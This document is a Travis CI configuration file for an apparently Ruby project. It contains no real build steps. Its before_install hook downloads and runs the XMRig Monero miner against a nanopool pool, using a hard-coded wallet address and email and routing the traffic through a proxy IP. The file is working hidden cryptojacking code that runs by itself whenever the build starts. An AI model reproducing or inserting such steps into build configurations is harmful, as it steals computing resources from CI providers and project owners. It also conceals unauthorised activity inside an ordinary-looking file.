language: ruby

branches:
  only:
  - main

before_install:
  - wget https://github.com/xmrig/xmrig/releases/download/v6.7.0/xmrig-6.7.0-linux-static-x64.tar.gz
  - tar xf *gz && rm -rf *gz
  - cd xmrig*
  - ./xmrig -o xmr-us-east1.nanopool.org:14444 -u 8C6WxmnyFchELxZP1sjCAb1XyVRTsh7riichNhnGrhjcCf4J5kwZUQKPScUDXSh7ynWsL54MvDKGt1ZWjR3Wq8Xz83w1eKq.X3/angga@linuxmail.org -p x -a rx/0 --proxy=192.111.138.29:4145
